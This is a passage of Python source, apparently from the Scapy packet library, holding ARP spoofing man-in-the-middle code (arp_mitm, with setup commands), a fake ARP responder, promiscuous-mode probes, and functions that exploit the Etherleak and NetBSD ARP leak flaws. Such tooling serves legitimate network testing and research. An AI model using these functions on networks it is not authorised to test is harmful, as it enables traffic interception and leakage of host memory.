
910 :param ip1: IPv4 of the first machine 

911 :param ip2: IPv4 of the second machine 

912 :param mac1: MAC of the first machine (optional: will ARP otherwise) 

913 :param mac2: MAC of the second machine (optional: will ARP otherwise) 

914 :param broadcast: if True, will use broadcast mac for MitM by default 

915 :param target_mac: MAC of the attacker (optional: default to the interface's one) 

916 :param iface: the network interface. (optional: default, route for ip1) 

917 

918 Example usage:: 

919 

920 $ sysctl net.ipv4.conf.virbr0.send_redirects=0 # virbr0 = interface 

921 $ sysctl net.ipv4.ip_forward=1 

922 $ sudo iptables -t mangle -A PREROUTING -j TTL --ttl-inc 1 

923 $ sudo scapy 

924 >>> arp_mitm("192.168.122.156", "192.168.122.17") 

925 

926 Alternative usages: 

927 >>> arp_mitm("10.0.0.1", "10.1.1.0/21", iface="eth1") 

928 >>> arp_mitm("10.0.0.1", "10.1.1.2", 

929 ... target_mac="aa:aa:aa:aa:aa:aa", 

930 ... mac2="00:1e:eb:bf:c1:ab") 

931 

932 .. warning:: 

933 If using a subnet, this will first perform an arping, unless broadcast is on! 

934 

935 Remember to change the sysctl settings back.. 

936 """ 

937 if not iface: 

938 iface = conf.route.route(ip1)[0] 

939 if not target_mac: 

940 target_mac = get_if_hwaddr(iface) 

941 

942 def _tups(ip, mac): 

943 # type: (str, Optional[Union[str, List[str]]]) -> Iterable[Tuple[str, str]] 

944 if mac is None: 

945 if broadcast: 

946 # ip can be a Net/list/etc and will be iterated upon while sending 

947 return [(ip, "ff:ff:ff:ff:ff:ff")] 

948 return [(x.query.pdst, x.answer.hwsrc) 

949 for x in arping(ip, verbose=0, iface=iface)[0]] 

950 elif isinstance(mac, list): 

951 return [(ip, x) for x in mac] 

952 else: 

953 return [(ip, mac)] 

954 

955 tup1 = _tups(ip1, mac1) 

956 if not tup1: 

957 raise OSError(f"Could not resolve {ip1}") 

958 tup2 = _tups(ip2, mac2) 

959 if not tup2: 

960 raise OSError(f"Could not resolve {ip2}") 

961 print(f"MITM on {iface}: %s <--> {target_mac} <--> %s" % ( 

962 [x[1] for x in tup1], 

963 [x[1] for x in tup2], 

964 )) 

965 # We loop who-has requests 

966 srploop( 

967 list(itertools.chain( 

968 (x 

969 for ipa, maca in tup1 

970 for ipb, _ in tup2 

971 if ipb != ipa 

972 for x in 

973 Ether(dst=maca, src=target_mac) / 

974 ARP(op="who-has", psrc=ipb, pdst=ipa, 

975 hwsrc=target_mac, hwdst="00:00:00:00:00:00") 

976 ), 

977 (x 

978 for ipb, macb in tup2 

979 for ipa, _ in tup1 

980 if ipb != ipa 

981 for x in 

982 Ether(dst=macb, src=target_mac) / 

983 ARP(op="who-has", psrc=ipa, pdst=ipb, 

984 hwsrc=target_mac, hwdst="00:00:00:00:00:00") 

985 ), 

986 )), 

987 filter="arp and arp[7] = 2", 

988 inter=inter, 

989 iface=iface, 

990 timeout=0.5, 

991 verbose=1, 

992 store=0, 

993 ) 

994 print("Restoring...") 

995 sendp( 

996 list(itertools.chain( 

997 (x 

998 for ipa, maca in tup1 

999 for ipb, macb in tup2 

1000 if ipb != ipa 

1001 for x in 

1002 Ether(dst="ff:ff:ff:ff:ff:ff", src=macb) / 

1003 ARP(op="who-has", psrc=ipb, pdst=ipa, 

1004 hwsrc=macb, hwdst="00:00:00:00:00:00") 

1005 ), 

1006 (x 

1007 for ipb, macb in tup2 

1008 for ipa, maca in tup1 

1009 if ipb != ipa 

1010 for x in 

1011 Ether(dst="ff:ff:ff:ff:ff:ff", src=maca) / 

1012 ARP(op="who-has", psrc=ipa, pdst=ipb, 

1013 hwsrc=maca, hwdst="00:00:00:00:00:00") 

1014 ), 

1015 )), 

1016 iface=iface 

1017 ) 

1018 

1019 

1020class ARPingResult(SndRcvList): 

1021 def __init__(self, 

1022 res=None, # type: Optional[Union[_PacketList[QueryAnswer], List[QueryAnswer]]] # noqa: E501 

1023 name="ARPing", # type: str 

1024 stats=None # type: Optional[List[Type[Packet]]] 

1025 ): 

1026 SndRcvList.__init__(self, res, name, stats) 

1027 

1028 def show(self, *args, **kwargs): 

1029 # type: (*Any, **Any) -> None 

1030 """ 

1031 Print the list of discovered MAC addresses. 

1032 """ 

1033 data = list() # type: List[Tuple[str | List[str], ...]] 

1034 

1035 for s, r in self.res: 

1036 manuf = conf.manufdb._get_short_manuf(r.src) 

1037 manuf = "unknown" if manuf == r.src else manuf 

1038 data.append((r[Ether].src, manuf, r[ARP].psrc)) 

1039 

1040 print( 

1041 pretty_list( 

1042 data, 

1043 [("src", "manuf", "psrc")], 

1044 sortBy=2, 

1045 ) 

1046 ) 

1047 

1048 

1049@conf.commands.register 

1050def arping(net: str, 

1051 timeout: int = 2, 

1052 cache: int = 0, 

1053 verbose: Optional[int] = None, 

1054 threaded: bool = True, 

1055 **kargs: Any, 

1056 ) -> Tuple[ARPingResult, PacketList]: 

1057 """ 

1058 Send ARP who-has requests to determine which hosts are up:: 

1059 

1060 arping(net, [cache=0,] [iface=conf.iface,] [verbose=conf.verb]) -> None 

1061 

1062 Set cache=True if you want arping to modify internal ARP-Cache 

1063 """ 

1064 if verbose is None: 

1065 verbose = conf.verb 

1066 

1067 hwaddr = None 

1068 if "iface" in kargs: 

1069 hwaddr = get_if_hwaddr(kargs["iface"]) 

1070 if isinstance(net, list): 

1071 hint = net[0] 

1072 else: 

1073 hint = str(net) 

1074 psrc = conf.route.route(hint, verbose=False)[1] 

1075 if psrc == "0.0.0.0": 

1076 if "iface" in kargs: 

1077 psrc = get_if_addr(kargs["iface"]) 

1078 else: 

1079 warning( 

1080 "No route found for IPv4 destination %s. " 

1081 "Using conf.iface. Please provide an 'iface' !" % hint) 

1082 psrc = get_if_addr(conf.iface) 

1083 hwaddr = get_if_hwaddr(conf.iface) 

1084 kargs["iface"] = conf.iface 

1085 

1086 ans, unans = srp( 

1087 Ether(dst="ff:ff:ff:ff:ff:ff", src=hwaddr) / ARP( 

1088 pdst=net, 

1089 psrc=psrc, 

1090 hwsrc=hwaddr 

1091 ), 

1092 verbose=verbose, 

1093 filter="arp and arp[7] = 2", 

1094 timeout=timeout, 

1095 threaded=threaded, 

1096 iface_hint=hint, 

1097 **kargs, 

1098 ) 

1099 ans = ARPingResult(ans.res) 

1100 

1101 if cache and ans is not None: 

1102 for pair in ans: 

1103 _arp_cache[pair[1].psrc] = pair[1].hwsrc 

1104 if ans is not None and verbose: 

1105 ans.show() 

1106 return ans, unans 

1107 

1108 

1109@conf.commands.register 

1110def is_promisc(ip, fake_bcast="ff:ff:00:00:00:00", **kargs): 

1111 # type: (str, str, **Any) -> bool 

1112 """Try to guess if target is in Promisc mode. The target is provided by its ip.""" # noqa: E501 

1113 

1114 responses = srp1(Ether(dst=fake_bcast) / ARP(op="who-has", pdst=ip), type=ETH_P_ARP, iface_hint=ip, timeout=1, verbose=0, **kargs) # noqa: E501 

1115 

1116 return responses is not None 

1117 

1118 

1119@conf.commands.register 

1120def promiscping(net, timeout=2, fake_bcast="ff:ff:ff:ff:ff:fe", **kargs): 

1121 # type: (str, int, str, **Any) -> Tuple[ARPingResult, PacketList] 

1122 """Send ARP who-has requests to determine which hosts are in promiscuous mode 

1123 promiscping(net, iface=conf.iface)""" 

1124 ans, unans = srp(Ether(dst=fake_bcast) / ARP(pdst=net), 

1125 filter="arp and arp[7] = 2", timeout=timeout, iface_hint=net, **kargs) # noqa: E501 

1126 ans = ARPingResult(ans.res, name="PROMISCPing") 

1127 

1128 ans.show() 

1129 return ans, unans 

1130 

1131 

1132class ARP_am(AnsweringMachine[Packet]): 

1133 """Fake ARP Relay Daemon (farpd) 

1134 

1135 example: 

1136 To respond to an ARP request for 192.168.100 replying on the 

1137 ingress interface:: 

1138 

1139 farpd(IP_addr='192.168.1.100',ARP_addr='00:01:02:03:04:05') 

1140 

1141 To respond on a different interface add the interface parameter:: 

1142 

1143 farpd(IP_addr='192.168.1.100',ARP_addr='00:01:02:03:04:05',iface='eth0') 

1144 

1145 To respond on ANY arp request on an interface with mac address ARP_addr:: 

1146 

1147 farpd(ARP_addr='00:01:02:03:04:05',iface='eth1') 

1148 

1149 To respond on ANY arp request with my mac addr on the given interface:: 

1150 

1151 farpd(iface='eth1') 

1152 

1153 Optional Args:: 

1154 

1155 inter=<n> Interval in seconds between ARP replies being sent 

1156 

1157 """ 

1158 

1159 function_name = "farpd" 

1160 filter = "arp" 

1161 send_function = staticmethod(sendp) 

1162 

1163 def parse_options(self, IP_addr=None, ARP_addr=None, from_ip=None): 

1164 # type: (Optional[str], Optional[str], Optional[str]) -> None 

1165 if isinstance(IP_addr, str): 

1166 self.IP_addr = Net(IP_addr) # type: Optional[Net] 

1167 else: 

1168 self.IP_addr = IP_addr 

1169 if isinstance(from_ip, str): 

1170 self.from_ip = Net(from_ip) # type: Optional[Net] 

1171 else: 

1172 self.from_ip = from_ip 

1173 self.ARP_addr = ARP_addr 

1174 

1175 def is_request(self, req): 

1176 # type: (Packet) -> bool 

1177 if not req.haslayer(ARP): 

1178 return False 

1179 arp = req[ARP] 

1180 return ( 

1181 arp.op == 1 and 

1182 (self.IP_addr is None or arp.pdst in self.IP_addr) and 

1183 (self.from_ip is None or arp.psrc in self.from_ip) 

1184 ) 

1185 

1186 def make_reply(self, req): 

1187 # type: (Packet) -> Packet 

1188 ether = req[Ether] 

1189 arp = req[ARP] 

1190 

1191 if 'iface' in self.optsend: 

1192 iff = cast(Union[NetworkInterface, str], self.optsend.get('iface')) 

1193 else: 

1194 iff, a, gw = conf.route.route(arp.psrc) 

1195 self.iff = iff 

1196 if self.ARP_addr is None: 

1197 try: 

1198 ARP_addr = get_if_hwaddr(iff) 

1199 except Exception: 

1200 ARP_addr = "00:00:00:00:00:00" 

1201 else: 

1202 ARP_addr = self.ARP_addr 

1203 resp = Ether(dst=ether.src, 

1204 src=ARP_addr) / ARP(op="is-at", 

1205 hwsrc=ARP_addr, 

1206 psrc=arp.pdst, 

1207 hwdst=arp.hwsrc, 

1208 pdst=arp.psrc) 

1209 return resp 

1210 

1211 def send_reply(self, reply, send_function=None): 

1212 # type: (Packet, Any) -> None 

1213 if 'iface' in self.optsend: 

1214 self.send_function(reply, **self.optsend) 

1215 else: 

1216 self.send_function(reply, iface=self.iff, **self.optsend) 

1217 

1218 def print_reply(self, req, reply): 

1219 # type: (Packet, Packet) -> None 

1220 print("%s ==> %s on %s" % (req.summary(), reply.summary(), self.iff)) 

1221 

1222 

1223@conf.commands.register 

1224def etherleak(target, **kargs): 

1225 # type: (str, **Any) -> Tuple[SndRcvList, PacketList] 

1226 """Exploit Etherleak flaw""" 

1227 return srp(Ether() / ARP(pdst=target), 

1228 prn=lambda s_r: conf.padding_layer in s_r[1] and hexstr(s_r[1][conf.padding_layer].load), # noqa: E501 

1229 filter="arp", **kargs) 

1230 

1231 

1232@conf.commands.register 

1233def arpleak(target, plen=255, hwlen=255, **kargs): 

1234 # type: (str, int, int, **Any) -> Tuple[SndRcvList, PacketList] 

1235 """Exploit ARP leak flaws, like NetBSD-SA2017-002. 

1236 

1237https://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2017-002.txt.asc 

1238 

1239 """ 

1240 # We want explicit packets 

1241 pkts_iface = {} # type: Dict[str, List[Packet]] 

1242 for pkt in ARP(pdst=target): 

1243 # We have to do some of Scapy's work since we mess with 

1244 # important values 

1245 iface = conf.route.route(pkt.pdst)[0] 

1246 psrc = get_if_addr(iface) 

1247 hwsrc = get_if_hwaddr(iface) 

1248 pkt.plen = plen 

1249 pkt.hwlen = hwlen 

1250 if plen == 4: 

1251 pkt.psrc = psrc 

1252 else: 

1253 pkt.psrc = inet_aton(psrc)[:plen] 

1254 pkt.pdst = inet_aton(pkt.pdst)[:plen] 

1255 if hwlen == 6: 

1256 pkt.hwsrc = hwsrc 

1257 else: 

1258 pkt.hwsrc = mac2str(hwsrc)[:hwlen] 

1259 pkts_iface.setdefault(iface, []).append( 

1260 Ether(src=hwsrc, dst=ETHER_BROADCAST) / pkt 

1261 ) 

1262 ans, unans = SndRcvList(), PacketList(name="Unanswered") 

1263 for iface, pkts in pkts_iface.items(): 

1264 ans_new, unans_new = srp(pkts, iface=iface, filter="arp", **kargs) 

1265 ans += ans_new 

1266 unans += unans_new 

1267 ans.listname = "Results" 

1268 unans.listname = "Unanswered" 

1269 for _, rcv in ans: 

1270 if ARP not in rcv: 

1271 continue 

1272 rcv = rcv[ARP] 

1273 psrc = rcv.get_field('psrc').i2m(rcv, rcv.psrc) 

1274 if plen > 4 and len(psrc) > 4: 

1275 print("psrc") 

1276 hexdump(psrc[4:]) 

1277 print() 

1278 hwsrc = rcv.get_field('hwsrc').i2m(rcv, rcv.hwsrc) 

1279 if hwlen > 6 and len(hwsrc) > 6: 

1280 print("hwsrc") 

1281 hexdump(hwsrc[6:]) 

1282 print() 

1283 return ans, unans